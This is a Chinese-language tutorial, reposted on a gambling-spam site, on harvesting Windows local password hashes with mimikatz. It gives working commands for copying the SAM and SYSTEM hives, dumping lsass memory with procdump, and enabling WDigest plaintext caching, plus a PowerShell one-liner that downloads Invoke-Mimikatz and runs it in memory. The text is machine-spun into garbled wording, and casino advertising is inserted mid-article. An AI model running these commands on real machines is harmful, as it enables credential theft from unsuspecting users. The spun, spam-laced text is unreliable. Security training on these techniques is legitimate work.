前言

  • 在Windows操作系统上,sam数据库(C:\Windows\System32\config\sam)里保留着内陆用户的hash。
  • 在内陆认证的流程中,作为内陆平安权限服务历程lsass.exe也会把用户密码缓存在内存中(dmp文件)。

从上面的两个思绪最先,我们行使mimkatz工具作为辅助,来抓取内陆用户的hash。

SAM数据库提取

https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump

lsadump::sam

此下令可以转存储SAM数据库,内里包含了内陆用户的密码hash。

它有两种事情模式:online and offline

online 模式

online事情模式:需要用户具备SYSTEM权限使用模拟的SYSTEM令牌,否则将会发生拒绝接见报错:

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第1张

下面通过使用模拟SYSTEM令牌(token::elevate)举行演示:

privilege::debug
token::elevate
lsadump::sam
  • privilege::debug

    获得debug权限。

  • token::elevate

    模拟一个system令牌。

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第2张

offline 模式

offline模式:获取当前系统的SAM数据库文件,在另一系统下举行读取。Win2000和XP需要先提到SYSTEM,03最先直接可以reg save。

导出SAM数据库文件有以下两种实现方式:

  • 保留注册表
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第3张

文件保留在执行下令的目录:

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第4张

  • 复制文件
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM

默认无法复制:

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第5张

需要借助工具:https://github.com/3gstudent/NinjaCopy

导出SAM数据库后,把文件放置mimikatz目录下:

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第6张

执行下令:

lsadump::sam /sam:sam.hiv /system:system.hiv

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第7张

事情原理

参考:渗透技巧-通过sam数据库获取内陆用户hash

  1. 读取hklm\system获取syskey
  2. 使用syskey解密hklm\sam

优瑕玷对照

online模式:使用简朴,然则特征显著,通常会被平安产品阻挡。

offline模式:导出的文件大,效率低,然则平安。

其他工具

  • pwdump7

    下载地址:

    http://passwords.openwall.net/b/pwdump/pwdump7.zip

    ,

    usdt币游_ALLbet6.com

    欢迎进入usdt币游网址(Allbet Gaming):www.aLLbetgame.us,欧博allbet网址开放欧博allbet网址、会员注册、代理开户、电脑客户端下载、苹果安卓下载等业务。

    ,

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第8张

  • powershell

    下载地址:

    https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1

    下载后内陆执行:

powershell Import-Module .\Invoke-PowerDump.ps1;Invoke-PowerDump

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第9张

  • QuarkPwDump

    项目地址:https://github.com/quarkslab/quarkspwdump

    已编译版本:https://github.com/redcanari/quarkspwdump/releases

lsass内存提权

使用mimikatz直接导出凭证

https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa

该模块从lsass.exe的内存中提权hash,需要具备下面的条件之一:

  • administrator,可以通过privilege::debug获得调试权限
  • SYSTEM权限

下面通过privilege::debug举行演示:

  • 内陆交互式抓取:
privilege::debug
log
sekurlsa::logonpasswords

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第10张

会在当前shell运行的目录下天生mimikatz.log

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第11张

  • 内陆非交互式抓取:
mimikatz.exe log "privilege::debug" "sekurlsa::logonPasswords full" exit

瑕玷也异常显著,通常会被平安产品阻挡。

  • powershell加载mimikatz抓取:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

或者下载内陆执行:

powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "log" "sekurlsa::logonPasswords full"'

通过lsass历程的dmp文件导出凭证

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第12张

会在当前目录天生lsass.dmp文件:

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第13张

然后从lsass.dmp文件导出凭证,通过mimikatz完成:

mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取 安全技术 众测渗透 第14张

  • 事情原理以及bypass:

    参考:渗透基础-从lsass.exe举行导出凭证

    通过API MiniDumpWriteDump()获得lsass.exe历程的dmp文件。

  • 明文密码问题

    参考:红蓝匹敌之Windows内网渗透

    为什么有的抓不到明文密码,主要照样kb2871997的问题。kb2871997补丁会删除除了wdigest ssp以外其他ssp的明文凭证,但对于wdigest ssp只能选择禁用。

    然则用户可以手动开启:

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    


Allbet声明:该文看法仅代表作者自己,与www.allbetgame.us无关。转载请注明:电银付使用教程(dianyinzhifu.com):从mimikatz学Windows内陆hash抓取
发布评论

分享到:

日本著名物理学家有马朗人去世 享年90岁
你是第一个吃螃蟹的人
发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。